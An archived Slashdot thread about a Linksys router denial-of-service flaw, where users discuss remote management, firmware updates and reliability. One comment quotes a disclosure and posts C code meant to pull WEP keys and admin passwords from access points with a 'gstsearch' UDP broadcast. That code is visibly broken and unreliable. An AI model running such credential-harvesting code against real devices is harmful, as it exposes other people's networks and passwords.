Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Vulnerability In Linksys Cable/DSL Router

CowboyNeal posted more than 11 years ago | from the bugs-sploits-and-buffer-overruns dept.

Security 262

ispcay writes "Yahoo has published an article on a Linksys vulnerability. An easily exploitable software vulnerability in a common home networking router by Linksys Group could expose thousands of home users to denial of service attacks, according to a security advisory issued by iDefense, a software security company." The article's kinda sparse on details, but does mention that the vulnerability is fixed in the latest firmware release. Upgrade 'em if ya got 'em!

cancel ×

262 comments

Sorry! There are no comments related to the filter you selected.

fp (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4614514)

fp

Luckily for me... (0, Troll)

pope nihil (85414) | more than 11 years ago | (#4614517)

I use netgear :)

Not to say that something like this won't happen to netgear. Plus you have to be concerned about those companies putting backdoors in for the NSA.

Re:Luckily for me... (1, Informative)

Anonymous Coward | more than 11 years ago | (#4614573)

Netgear home routers are rock solid when attached to cable modems, but are kind of flakey when attached to PPPoE DSL modems. But, then again, DSL is flakey itself. Just say NO to DSL! And a bigger fucking 'no' to the abortion of a protocol called PPPoE.

Re:Luckily for me... (1)

dirvish (574948) | more than 11 years ago | (#4614614)

Luckily for me...

I updated to version 1.42.7 months ago.

What's the best home router to buy? (0)

Anonymous Coward | more than 11 years ago | (#4614756)

Opinions?

So that's what happened to me 3 weeks ago... (2)

DaedalusLogic (449896) | more than 11 years ago | (#4614851)

I saw this happening on my router about three weeks ago... lights freaking out blinking... in other words a lot of traffic going through... Hit the good ole netstat -n and the spoofed IP adds were from get this... IANA.org What a sense of humor! Went through a bout of paranoia updated all my hardware firmware and other crap... Called Comcast told them about the DoS attack... of course they didn't care...

Still a great piece of hardware.

Upgrade Firmware (5, Funny)

moertle (140345) | more than 11 years ago | (#4614518)

after everyone who knows what they are doing flashes their firmware, 99.9% of routers will remain vulnerable...

Re:Upgrade Firmware (0)

Anonymous Coward | more than 11 years ago | (#4614549)

well, yeah, that's how the world of home personal computing works. i saw this story 4 minutes after it was posted, and i've already flashed my router. its a good little piece of equipment though, on the whole.

Re:Upgrade Firmware (5, Informative)

Unknown Relic (544714) | more than 11 years ago | (#4614575)

While this is true, it's really not that big of a deal. The article states that for this attack to work from outside your internal network the remote management functionality needs to be turned on. I own a Linksys router and know for a fact that this feature is not enabled by default. Chances are that those knowledgible enough to require, and enable, remote management will be the same tiny percentage who will bother to update their firmware.

While the attack will still work from inside the local network regardless of the state of the remote management function, it's really not a danger. The worst that someone could really do is DOS themselves, and wouldn't that be a shame...

Re:Upgrade Firmware (2)

Charles Dodgeson (248492) | more than 11 years ago | (#4614816)

While the attack will still work from inside the local network regardless of the state of the remote management function, it's really not a danger. The worst that someone could really do is DOS themselves, and wouldn't that be a shame
If, as I believe, the attack can be in the form of a URL, then imagine email like that contained something like

<a href="linksysCrasher">http://innocuous.site/</a&gt ;

(I typed that in correctly, but sd seems to add a space before the last semi-colon)

Some like that could fool people into DOSing themselves.

Re:Upgrade Firmware (2)

darkov (261309) | more than 11 years ago | (#4614826)

I bought a couple of these buggers- they were cheap (about $US80) and effective. But on the first day I decided to flash the ROM on one of them to the latest firmware. I followed all the instructions and the unit was toast. Three weeks later I got a replacement unit.

It's so easy for something to go wrong when flashing ROMs, I can't really risk doing without my router for weeks on end. Even if you know what you're doing, there's little you can do if it fails.

Re:Upgrade Firmware (5, Informative)

AmigaAvenger (210519) | more than 11 years ago | (#4614839)

Did the same thing, and after digging through linksys's site, i found out there IS a way to correct it. (check the docs, basically you just toss a new firmware up to it even if it doesn't respond. The router portion is seperate from the switch, which seems to be able to flash it.)

4th Post? (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4614521)

ya

remote management (5, Informative)

budcub (92165) | more than 11 years ago | (#4614530)

According to the article, if you have remote management turned off, then people out on the internet can't use the exploit against you.

Re:remote management (0)

Anonymous Coward | more than 11 years ago | (#4614825)

anyone with remote management turned on is a dumbass anyhow

Linksys SUCKS!!! (0, Flamebait)

Wakko Warner (324) | more than 11 years ago | (#4614532)

If this thing behaves anything like the way my WAP-11 wireless access point behaves, I feel really sorry for the people using this as their firewall.

There were days I couldn't even reach downstairs with the damned thing. . .

- A.P.

Re:Linksys SUCKS!!! (2)

jmv (93421) | more than 11 years ago | (#4614631)

I have a WAP-11 and it would freeze everytime I'd transfer at "high" speed. Upgrading the firmware solved the problem. Now about range, I've seen a Cisco WAP suck even more (15" range indoor) and somehow resetting all default (which we didn't change) made it work. Seems like all this Wi-Fi equipment is still a bit experimental...

Re:Linksys SUCKS!!! (1)

slantyyz (196624) | more than 11 years ago | (#4614654)

If this thing behaves anything like the way my WAP-11 wireless access point behaves, I feel really sorry for the people using this as their firewall.

Well, if you can't reach downstairs, at least you've eliminated the risk of being warchalked.

Re:Linksys SUCKS!!! (2)

tulare (244053) | more than 11 years ago | (#4614676)

Nah, dude. I've had a BEFSR41 for almost two years now, and it has been nothing but rock-solid. Zero complaints on this unit. Of course, nmap identifies it as "trivial" but it's just a home box, more than adequate for keeping the casual s'kiddie off my back :)

Re:Linksys SUCKS!!! (1)

agent0range_ (472103) | more than 11 years ago | (#4614811)

Some people get a bit better range [d128.com] with their WAP-11's. Of course, you have to make your own antenna (or buy one).

Personally, I've never touched the WAP-11, but I do use the BEFW11S4-AT, and haven't had any problems for it.

As for this vulnerability, it's pretty much a non-issue. So some script-kiddie crashes your router. What do you do? Hit the reset button. There you go, now you're up and running again. Maybe it will even be enough of a lesson for you to go out and update the firmware, then disable remote management (which I've never even seen enabled by default on ANY of linksys' routers).

Linksys (0)

sprprsnmn (619113) | more than 11 years ago | (#4614537)

Don't most of the router/firewalls Linksys sells run GNU/Linux as their embedded OS? I seem to remember reading an article in linuxjournal that said as much.

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614579)

No. They don't really have much of an OS. I worked on one of the earlier models, and as far as I know they're still using essentially the same code.

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614627)

how much RAM/ROM is in one of those things, anyway?

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614672)

The model I worked on had 32K RAM, and an 8K boot PROM.

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614713)

enough for space invaders - cool thanks.

Re:Linksys (2)

cscx (541332) | more than 11 years ago | (#4614689)

How could the "not really have much of an OS" if it runs an HTTP server?

Re:Linksys (0)

Anonymous Coward | more than 11 years ago | (#4614730)

Uhhhh. It's not like it's running apache or anything. It's very minimalistic, and is written in hand optimized H8 assembly.

Re:Linksys (2, Informative)

MightyDrake (612329) | more than 11 years ago | (#4614742)

It doesn't take much to implement a TCP/IP stack, apparently. Check out a matchhead-sized web server. http://www-ccs.cs.umass.edu/~shri/iPic.html

Re:Linksys (2)

cscx (541332) | more than 11 years ago | (#4614661)

Yes. [linksys.com.sg]

Hillary Rosen (5, Funny)

CatWrangler (622292) | more than 11 years ago | (#4614538)

I am sure not a single hacker out there is going to investigate if Hillary Rosen has upgraded her software, and if they did so, it would only be to test her system, due to concern for her security and to warn her of possible problems.

DOS attack easily resolved by resetting device (2, Interesting)

Anonymous Coward | more than 11 years ago | (#4614539)

It's a 4 port home router - who's going to wage a DOS attack on a piddly $50 home router? And even if they did - just reset the darn thing. No big deal. I would only get the patch if this problem happened repeatedly.

Re:DOS attack easily resolved by resetting device (2, Interesting)

ralphus (577885) | more than 11 years ago | (#4614681)

I had someone launch a small one on me believe it or not. 50$ linksys router, cable modem, I notice a nmap scan happening, so i send him back some ICMP echo requests with LEAVE ME ALONE in the payload, and then about 25 zombies shut down my connection for about 20 mintues.

someone will attack anything for the same reason people climb mt Everest.

Re:DOS attack easily resolved by resetting device (0)

Anonymous Coward | more than 11 years ago | (#4614724)

someone will attack anything for the same reason people climb mt Everest.

chicks??

Re:DOS attack easily resolved by resetting device (0)

Anonymous Coward | more than 11 years ago | (#4614755)

You dolt! That was me, Morpheus. I was trying to tell you to wake up, Neo.

Re:DOS attack easily resolved by resetting device (0)

Anonymous Coward | more than 11 years ago | (#4614798)

I would only get the patch if this problem happened repeatedly.

Yeah, I sure wouldn't want to waste the five minutes it's going to take to install the updated firmware and plug a security hole. I'd rather have to reset my router in the middle of a 600 Mb download.

Actually, this little thing is kinda powerful (5, Insightful)

The Breeze (140484) | more than 11 years ago | (#4614871)

The default Linksys in the article has 4 ports, true, but they can actually support 254 clients if you connect them to a switch. Furthermore, the BEFSR11 is a one-port, designed to be connected to a switch or hub, and has proven very popular in labs of anywhere from 10-30 workstations, although it can actually support up to 254 clients. Consequently, there are those out there who may get a sick kick out of kicking schools, non-profit organizations and other institutions offline.

The BEFSR11 is truly cool. $50 gets you a box that barely draws any power and routes requests quite nicely for 254 machines and functions as a DHCP server to boot. Practically maintenance free. Most of mine already have upgraded firmware, but you can bet that I - and several other admins who oversee non-profit and educational sites - will be busy checking firmware versions for a while.

i thought this was already known... (2, Interesting)

Essron (231281) | more than 11 years ago | (#4614541)

I heard the 'remote management' option was a huge vunerability over a year ago. I'm no expert, but I doubt any security consious folks would have remote management enabled, and it is not clear if the boxes are vulerable with this feature turned off.

Or am I missing something?

Re:i thought this was already known... (0)

Anonymous Coward | more than 11 years ago | (#4614865)

Linksys routers have this option disabled by default...

Simple fix, not hard (5, Insightful)

tulare (244053) | more than 11 years ago | (#4614543)

From the e-week article, all you have to do is disable remote admin, which is the default setting, which you should have confirmed anyhow. Duh.
No firmware flashing needed.

Users would have to turn remote management on (5, Informative)

hillct (230132) | more than 11 years ago | (#4614544)

While I agree that the vast majority of home users will either lack the technical expertise or poise to flash the firmware, these are the people who will plug in the router and forget it, which means remote management won't be turned on so the attack won't be possible (unless the user opens up a telnet or SSH port for NAT pass-thru.

--CTH

And on top of that... (2)

devphil (51341) | more than 11 years ago | (#4614659)


This boggles my mind:

The 4-port DSL router (vulnerable) is using firmware 1.40something, and must be upgraded. The latest is 1.43.

The 8-port model, which is what I have, and which is exactly the same damn thing (same functionality, same interface, almost the same user manual) except that it's a few inches wider and has 4 more ports, uses firmware 2.something. And is apparently not vulnerable.

Providing another 4 ports (one extra bit?) requires the firmware to be that different?

Re:And on top of that... (5, Informative)

Jace of Fuse! (72042) | more than 11 years ago | (#4614697)

Providing another 4 ports (one extra bit?) requires the firmware to be that different?

Having used both, I can tell you that they are not "exactly the same" as you put it.

The two models are very different.

For starters, the 8 port version is NOT a few inches wider. It's the exact same width and looks identical from the front except the light arrangement which is slightly different.

Secondly, it's a 4 port Switch AND a 4 port Hub, (4 switched ports, and 4 hub ports).

The 4 Switched ports have QoS options, and the 4 port hub can be given a priority of it's own (higher or lower than the switched ports, I believe).

There are also a few other details in the 8 port version that are not present in the 4 port version so we can safely assume they are functionality that is not present in the 4 port model for obvious reasons (it doesn't need them.)

Re:Users would have to turn remote management on (1)

Centinel (594459) | more than 11 years ago | (#4614849)

While I agree that the vast majority of home users will either lack the technical expertise or poise to flash the firmware, these are the people who will plug in the router and forget it, which means remote management won't be turned on so the attack won't be possible (unless the user opens up a telnet or SSH port for NAT pass-thru.

I flashed mine today and it's as brainless a job as it gets....download a Win32 executable, run it, it scans your RFC1918 network, finds the IP of your router, asks you to confirm the ip, then flashes...total time from download to complete in under 3 minutes, and nothing but clickin-n-dickin.

Sheesh, if someone can't figure that out....

Find Relief Here (5, Informative)

footNipple (541325) | more than 11 years ago | (#4614546)

This should get you on the path to recovery...this and a stiff shot of Black Bush:

http://www.linksys.com/download/default.asp [linksys.com]

Re:Find Relief Here (1)

jhunsake (81920) | more than 11 years ago | (#4614721)

C'mon! Everyone knows Bush is white [slashdot.org] !

Re:Find Relief Here (0)

Anonymous Coward | more than 11 years ago | (#4614728)

yes he is indeed [whitehouse.gov]

Hmmmm.... (4, Insightful)

El Pollo Loco (562236) | more than 11 years ago | (#4614548)

While I have a linksys router, this still does not concern me. All I have to do, is unplug it, and plug it back in. Net' access restored. I don't know of any home users who need 100% uptime internet access. I suppose there are some work at home people who might need it. But personally, I have enough problems with AT&T cables fluctuating speeds then I would with my router crashing.

Not too much of an issue (2)

metalhed77 (250273) | more than 11 years ago | (#4614550)

This only affects you if your router has 'remote management' enabled. Since so few people need this, and those that do are more technically minded, this shouldn't be much an issue. The worst this flaw can cause anyways is for the router to crash. The software in there sucks. My linksys crashes if it can't find a dhcp server, that a simple cgi script error crashes it is nothing new to me.

From what I see (5, Informative)

jchawk (127686) | more than 11 years ago | (#4614552)

It looks like in order to cause the crash you have have remote management enabled. Why on earth you would allow your router to be configured from outside on the internet boggles my mind. I would assume that this feature would be disabled by default, but then again who knows. I've owned a few cheap routers before and in order to use remote management you had to be connecting from an internal ip address, along with not coming through the wan port.

Just my 2 cents.

on my Linksys router (not vulnerable).. (1)

512k (125874) | more than 11 years ago | (#4614615)

remote management is disabled by default, and the option to enable it, is under the "advanced" tab.

And one reason to have it turned on, is if it's your responsibility to manage the router, and it's easier to connect to it remotely, than talk someone on the LAN through adjusting it over the phone....

now that I think about it, probably the major thing you'd change on the router, is the information you need to connect to your ISP, and with the wrong/outdated info, the router won't be on the internet in the first place.

And the point is what? (4, Insightful)

Chris_Stankowitz (612232) | more than 11 years ago | (#4614554)

Devices like linksys suffered from a much larger security problem. IGNORANCE! Highspeed access in the home has broght about a whole new type of internet user. The type that doesn't log off. Lets be honest, many of us are lazy. We know what we are doing but still lazy. Then there is the other group, not lazy, but they don't know what they are doing. The security issues that go along with Mulitple machines, always connected to the internet without ANY protection (Node firewalls like norton internet security for example or virus protection, i don't need to give an example of that) far exceed any "NEW" issues that may now exist becuase of a flaw in this product. Education!!! Plain and simple will reduce any threat that this flaw or any other would exacerbate.

Re:And the point is what? (0)

fliptw (560225) | more than 11 years ago | (#4614817)

As many have already stated, in order to exploit this externally, you need to have Remote Mangement turned on, which is disabled by default. And the routers also by default block all incoming ports Which means this is only exploitable on the lan side.

BEFSR41 upgrade utility link location (5, Informative)

NynexNinja (379583) | more than 11 years ago | (#4614555)

Here [linksys.com] is the location of the Linksys BEFSR41 firmware upgrade utility v1.43 released Sept 4, 2002. Its the newest one I could find.

not vulnerable by default (2, Informative)

XaXXon (202882) | more than 11 years ago | (#4614556)

I have one of these, and the remote administration isn't enabled by default.

So for Aunt Tilly, there's no real danger unless the malicious person is on the network.

Anyone remember the Bud Ice commercials? "...I REPEAT! THAT CALL WAS PLACED FROM INSIDE THE HOUSE!!"

All router versions appear to use the same fmwr (4, Informative)

quantumparadox (454022) | more than 11 years ago | (#4614557)

I upgraded by BESFR11 and it used the same firmware update as the *41 (4 port switch model) so its pretty safe to assume this version is vulnerable as well.

The firmware updates can be had here:

http://www.linksys.com/download/firmware.asp

lazy people unite! (0)

magwa (88267) | more than 11 years ago | (#4614558)

I was looking for a link to thier page since i am lazy. No one posted one yet, so here is one for all the other lazy people like me:

http://www.linksys.com/download/

Non-issue, really... (2, Redundant)

Keeper (56691) | more than 11 years ago | (#4614560)

Unless you've got your router setup to allow you to configure it remotely (ie: on the cablemodem side of the network; aka, while you're at your friends house). If you've done this, odds are this problem is the least of your concerns.

And there's already a firmware fix for it, should you be concerned that any script kiddies living in your house will want to hose their connection to the outside world...

Yeah Right.... (1)

dirkdidit (550955) | more than 11 years ago | (#4614567)

How many people that own these routers will actually update the firmware? Or how many even will know that their router has a problem. I know several people with Linksys routers and I know if somebody doesn't tell them to update something, they won't update it on their own. Even if the people who know how to update their routers and know that there is a problem update them, that still leaves the majority of users in the dark. Not a good idea.....

Re:Yeah Right.... (2)

TheOnlyCoolTim (264997) | more than 11 years ago | (#4614593)

But this majority also won't go into the advanced options of their Linksys to turn on Remote Management and make it vulnerable to this attack.

Re:Yeah Right.... (1)

el_flynn (1279) | more than 11 years ago | (#4614678)

I downloaded the firmware upgrade, it was a simple windows program where you had to specify the ip address of the router. So it's not "Flashing" per se, pretty simple and painless procedure (you don't even have to (gasp) reboot the unit) that i bet grammy could do it too.

Big deal, (3, Insightful)

Trusty Penfold (615679) | more than 11 years ago | (#4614572)



Firstly, my router (SMC, not linksys) crashes on it's own every now and then.
It's consumer grade gear, people are probably used to turning them off and back on again anyway. And it's not like the main computer is affected.

Secondly, the attack has to originate on the inside network. It's not like the script kiddiz can take out these box en masse by blasting out a load a packets. Once you visit a malicious site - if there even is a real one - you'll soon learn not to go there again.

Re:Big deal, (0)

Anonymous Coward | more than 11 years ago | (#4614612)

Do you have the latest SMC firmware?
Easy way to tell - do you have to login twice to the SMC router web admin screen? If so, that's a buggy one.

Re:Big deal, (1)

Trusty Penfold (615679) | more than 11 years ago | (#4614690)

Do you have the latest SMC firmware? Currently, yes. I can't honestly claim to keep update to date with patches for the non-obvious stuff though.

do you have to login twice? Nope, never had that one. How did they manage to write that bug? And how did QA miss it?

Re:Big deal, (2)

cscx (541332) | more than 11 years ago | (#4614830)

It's not like the script kiddiz can take out these box en masse by blasting out a load a packets.

See my other post here. [slashdot.org] All it takes is some UDP packets using nmap and the router goes belly-up. Try is sometime from an offsite unix host.

*sigh* (3, Informative)

jeffy124 (453342) | more than 11 years ago | (#4614574)

When will the media realize that not all DoS attacks are DDoS? DDoS is when the attacker gets a bunch of machines to all send data to the target machine, causing the target to run out of resources to handle all connections, swallowing the legit traffic in the process.

"Normal" DoS is what this is - crashing the target. For example, an old flaw in Wu-FTPD allowed a core dump - crashing the deamon and creating a DoS to anyone who needs it. All it took was a malformed request during a session. One machine required, not many.

change default admin password first!!!!! (0)

Anonymous Coward | more than 11 years ago | (#4614596)

1) most users have not changed the default admin password from 'admin'

2) this is only a problem on the inside network.

Bizarre!!! (2)

T-Kir (597145) | more than 11 years ago | (#4614591)

Wierd or what...

I've spent this evening trying to sort out why the router goes belly-up after using eDonkey for a while. The problem started a week ago, but since then the occurences were more regular. I just upgraded the firmware an hour ago!!!

I have the BEFSR411 and found a decent forum link with the same problem [broadbandreports.com] ... and there is another link of info/problems here [broadbandreports.com] .

I suppose it goes without saying that updating the firmware is a good idea... at least there are more improvements to the web-config interface. I'll just have to see how long the connection stays up.

Those Dumb Fucks (2, Informative)

cscx (541332) | more than 11 years ago | (#4614607)

I hate Linksys. I have that router, and it kept crashing on me. Changed the cable, everything, etc. Nothing. Even thought it was the cable modem for a while (would lose net access, but I finally found out the router wouldn't accept internal pings either). They sent me a new one (made ME pay for shipping), and it did the same thing. Tried all firmware versions, nothing.

Well, guess what. When you fire a bunch of UDP packets at it, the NAT routing table overflows and the router crashes (it happens faster if you have your DMZ host address set to a nonexistent address on the network), only to reboot itself in a few minutes. This has been tested and proven, but Linksys' response to me is "it's your software firewall, sir, you shouldn't run both at the same time." What a bunch of ignorant assholes. I informed them of the routing table overflow bug, but they ignored me.

Now, this bug shouldn't really affect anybody cause you really shouldn't run remote admin on your router, but with their shoddy firmware, it doesn't surprise me in the bit!

good/bad experiences with wireless Linksys router? (0)

Anonymous Coward | more than 11 years ago | (#4614651)

'cause I was thinking of buying one.
Also - which wireless PCMCIA (or whatever the acronym is) is a good one?
Is encryption turned on by default on these things?

Re:good/bad experiences with wireless Linksys rout (0)

Anonymous Coward | more than 11 years ago | (#4614725)

I just went around the fucking merry go round with linksys's wpc11 pcmcia card. What a flaming POS! The card was flimsy, the drivers flat out didn't work, and when I called the techsupport line the lady on the other end of the line in buttfuck India was clueless... AVOID ANYTHING LINKSYS!!! I switched to a netgear (ma401 iirc) wireless card and it Just Worked. No fuss, no muss.

Re:good/bad experiences with wireless Linksys rout (1)

RoundSparrow (341175) | more than 11 years ago | (#4614753)

Avoid FORD, get a Chevy. I had a Ford break down once...

Avoid Chevy, get a Ford, I had a Ford break down once....

Maybe it is the driver? Maybe if you buy the WORSE model Ford or Chevy makes you have problems? Brands don't mean crap. You have to get _specific_ on which model, which version of the Linksys, etc.

Re:good/bad experiences with wireless Linksys rout (1)

shepd (155729) | more than 11 years ago | (#4614875)

>Brands don't mean crap.

Because, hey, the only Lada that sucks is all of them.

Re:Those Dumb Fucks (2, Informative)

soulctcher (581951) | more than 11 years ago | (#4614840)

I've not had many problems with my linksys since the VERY early firmware. As far as the UDP packet issue, you may be right. I mod http://www.kaillera.com/ [kaillera.com] 's forums, [the Kaillera client/server software allows gaming programs, mainly emulators, to communicate over the net, though they normally wouldn't].

During the early stages, we had more and more people telling us that they were having problems accessing the servers in Kaillera. The connection protocol happens to be UDP.

The problem was, I was fine, as were a number of others that use(d) the linksys routers. Our suggestion was to upgrade the firmware or to just DMZ the router, which worked 90% of the time. For many people, that worked. Over the almost two years now, the problems w/the router have almost completely dissapeared.

Only DOS Attacks? Could be worse. (2, Funny)

Guido69 (513067) | more than 11 years ago | (#4614613)

If anyone hears reports of the '41 being subject to ME or XP attacks, please post. For now...well... I've never been afraid of a couple of backslashes or a c:\.

There are problems with wireless, too (5, Informative)

Raetsel (34442) | more than 11 years ago | (#4614649)


The following showed up on the NetStumbler [netstumbler.com] site yesterday:
  • GlobalSunTech develops Wireless Access Points for OEM customers like Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T during the setup phase showed a security problem.

    Sending a broadcast packet to UDP port 27155 containing the string "gstsearch" causes the accesspoint to return wep keys, mac filter and admin password. This happens on the WLAN Side and on the LAN Side.

    Systems Affected:


    • Vulnerable, tested, OEM Version from GlobalSunTech:
    • WISECOM GL2422AP-0T

    Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
    • D-Link DWL-900AP+ B1 version 2.1 and 2.2
    • ALLOY GL-2422AP-S
    • EUSSO GL2422-AP
    • LINKSYS WAP11 v2.2
(And I just got a WAP11, dammit.)

In other news, JWZ's DNA Lounge [dnalounge.com] is having troubles [dnalounge.com] with their Linksys WAP11-based wireless link, which is their only connectivity right now.

  • "...the best sustained throughput they can handle is on the order of 64k."
Ouch.

(They lost their T1 due to XO's bankrupcy and above.net closing a facility. Another T1 is on the way, but it'll be a couple weeks...)

Exploit Linksys Routers (1)

docstrange (161931) | more than 11 years ago | (#4614662)

When I ran the following code, which is designed to return the wep key, admin username and password on my linksys befsr41w. It hard locked. I tried it again. Same thing.

(the befsr41w is less common, it's like a befsr41 with a pcmcia slot so you can upgrade it to support wireless networking)

here's the code

#include
#include
#include
#include
#include
typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);
return 0;
}

Nuff Said. I'm dissappointed in Linksys.

Re:Exploit Linksys Routers (1)

Trusty Penfold (615679) | more than 11 years ago | (#4614782)


I doubt it was your linksys that was locking up; I'm guessing it was your compiler.

Old News (1)

Symb (182813) | more than 11 years ago | (#4614663)

This is old news all. Basically you could use SNMP to turn on the remote management (e.g. use web interface from the WAN side). Then once you had web access you could do anything the web interface would allow. They fixed this how long ago? PS There is a new release of the firmware postdating the article (1.43). Some moderator was in a hurry and posted FUD.

Re:Old News (proof) (2, Informative)

Symb (182813) | more than 11 years ago | (#4614714)

Oh and bugtraq [securityfocus.com] says that 1.42.7 isn't secure either.

Here [securepoint.com] is a mailing list archive or yet another redundant reference of this problem. It's almost a year old. Come on slashdotters, don't get sloppy in the deluge huh?

DoS? Who cares? (1)

nautical9 (469723) | more than 11 years ago | (#4614679)

It wouldn't take much to flood a DSL line with enough traffic to render it useless, no matter what router is on the home user's end. Only the ISP's routers could block a DoS attack like that.

Re:DoS? Who cares? (1)

updog (608318) | more than 11 years ago | (#4614873)

This DoS attack is not about flooding the DSL line with traffic; rather, it's caused by requesting a specific URL from the router:

To cause a crash, an attacker only needs to enter the URL (uniform resource locator) for a CGI (Common Gateway Interface) script used to configure and manage the router without providing any "arguments" (input for the script to process), according to iDefense.

in a related story ..... (5, Funny)

frovingslosh (582462) | more than 11 years ago | (#4614680)

If you leave your car unlocked with the keys in the ignition in N.Y.C., it's at risk.

What a lame report! The sparse on details is that the remote management feature is not enabled by default. Well, doh!, if I turn on remote management someone can get in and affect my system (particularly if I don't change the password). Imagine that!

Remote Access Management On By Default? (0)

Anonymous Coward | more than 11 years ago | (#4614704)

"However, if the router has a 'remote management' feature enabled, a malicious hacker could execute an attack from anywhere on the Internet by entering the IP (Internet Protocol) address of the router along with the name of the script into his or her Web browser."

This comes under the "Duh..." category. Why would anyone allow Remote Management Access on their router (or computer, for that matter) without a specific need for such a functionality and additional safeguards in place? Oh, I suppose that possibly the firmware had RMA "on" by default ....

This isn't that big of deal, theres been worse. (0)

Anonymous Coward | more than 11 years ago | (#4614707)

You still need the password anyway.
With the password they could just hit 'disconnect'. Its not THAT big of a deal.

I informed linksys of a far worse DoS that effected a default setting, even with remote access disabled, over a year ago. I never published it, but was very close to, since they were so rude on the phone and never responded to my emails.

A direct quote from one of the guys I was passed the phone too (after going through 3 bozos)

The guy asked me what linux kernel I was running, I told him that has nothing to do with the router. After more bizzare questions, he finally says "Yeah, so it probably has a problem. Its just a home router you know? Its not for production or anything."

Nutty. However it was fixed in the next firmware.

This one iDefense just published: A. Doesn't effect a default install and B. You need the password. If the attacker has your password, you have more to worry about then a silly DoS.

Re:This isn't that big of deal, theres been worse. (0)

Anonymous Coward | more than 11 years ago | (#4614770)

Yes. From iDefense [idefense.com] :

"Because successful exploitation requires password authentication, exploitation can only occur in two likely scenarios:

1.) The Linksys user is socially engineered into clicking on a link and authenticating to the router (e.g. "Check out this cool Linksys Easter Egg! Click here!")

2.) The Linksys user is logged into the router's web management console, and is the vicitm of a cross site scripting attack which redirects the user to this link."

Then the real problem is that Joe consumer was socially engineered, didn't change the default admin name and password, or is otherwise clueless. This is news?

why would anyone have remote-management enabled? (2)

lingqi (577227) | more than 11 years ago | (#4614717)

I mean, seriously, enlighten me here: why in the world would you want to remotely manage your *cheap* router?

"*in case i forgot to configure something before i went out" is not a good answer, by the way.

you will have more problem than DoS if you have the remote-configure enabled anyway - instead of a boring little DoS, I would try to crack the password and put all your computers in the demiliterized zone (is that what they call it these days?) and then try to break into your windows boxes (or linux or whatever). I bet half the people out there (probabbly more) never even changed the default password on their routers.

Sigh... this is such a non-issue. I can't believe I am wasing a whle 5 minutes yapping about it.

Re:why would anyone have remote-management enabled (2)

jonnythan (79727) | more than 11 years ago | (#4614801)

"*in case i forgot to configure something before i went out" is not a good answer, by the way.

Why not? Just today I realized that since I had upgraded my router's firmware, I had not opened the ssh ports to the OpenBSD box behind it.. and there were some files on that box I needed to put up for download from work.

So, I logged into the router, opened port 22 to the OBSD box, and then proceeded to ssh into it. This was a lifesaver.

Re:why would anyone have remote-management enabled (1)

soulctcher (581951) | more than 11 years ago | (#4614850)

That's a PERFECT example. Most of my remote management comes from port forwarding. Came in handy a number of times.

But... (2)

Ironica (124657) | more than 11 years ago | (#4614729)

What you're all forgetting is, this is only an issue if you have remote management enabled, and it's not enabled by default...

(Seriously, does anyone read a thread before they post anymore?)

I'm glad they posted this. Eventually I'll go over to my mom's house and upgrade her firmware. I can't really see her crashing her own router... well, not on purpose, anyway. She might by accident trying to go to Yahoo! (which is what she calls whatever browser she happens to be using, unless it's AOL. No, not net savvy.)

SMC (0, Flamebait)

awerg (201320) | more than 11 years ago | (#4614731)

Thank god I got a SMC router instead of a Linksys!

Does that mean that my win2k, winXP and win98 machines are safe now?

Mac OS Instructions (5, Informative)

Daleks (226923) | more than 11 years ago | (#4614734)

LinkSys only offers a specialized Windows firmware upgrading tool. The router itself has a Java applet that it supposed to work, but didn't for me in Mozilla 1.2b or IE 5.2.2. A friend directed me here [mactechnologies.com] . It has instructions on how to upgrade the firmware in Mac OS 9/X using their specialized tool. I worked for me.

Another one to add to this list (3, Informative)

indiigo (121714) | more than 11 years ago | (#4614748)

In one firmware update last year, the "WAN UPDATE" setting was defaulted to yes. This would enable anyone to connect to a linksys router and update the configuration to their hearts content, or write a script to scan through an IP range and automate it.

I reported this to linksys, they quickly gave me another firmware update, but other users reported the same thing.

http://arstechnica.infopop.net/OpenTopic/page?a= tp c&s=50009562&f=469092836&m=5300962863

Linksys vulnerabilities (2)

Animats (122034) | more than 11 years ago | (#4614750)

That particular router comes with no password as default, which makes it very vulnerable, because it will accept a TFTP firmware download from the WAN side. I don't know that anyone has bothered to write exploit firmware for the thing, but someone could send it a junk file via TFTP and lock it up.

Linksys firmware since February 2002 has been reasonably decent. Early versions would crash about once a day in normal operation.

What about other similar products? (1)

tyrelb (619467) | more than 11 years ago | (#4614766)

Many other products both software firewalls (i.e. for Windows) and hardware routers (i.e. my D-Link) include an option for remote admin.

If users were to enable remote admin on these products, would they not be just as venerable too?

It seems to me that home products may not require the remote admin feature. I never use mine, and I'm still alive!

Update without Windows client? (2)

Charles Dodgeson (248492) | more than 11 years ago | (#4614790)

Anyone spot any instructions on getting a Unixish tftp to do whatever authentication is necessary to update?

It's not all the urgent for me, since however idiotic I might be, I made doubly sure when I set the thing up that remote management was disabled. Imagine all the "http://admin:admin@address/" attempts there'd be otherwise.

This has been out for weeks! (2)

Newer Guy (520108) | more than 11 years ago | (#4614792)

Yes, there's a DoS possibility in the Linksys routers. It's fixed in the 1.43 firmware release. Anyone who reads the Linksys forum at DSL Reports has known about this for weeks!

NAT with no firewall ? (0, Offtopic)

Graspee_Leemoor (302316) | more than 11 years ago | (#4614803)

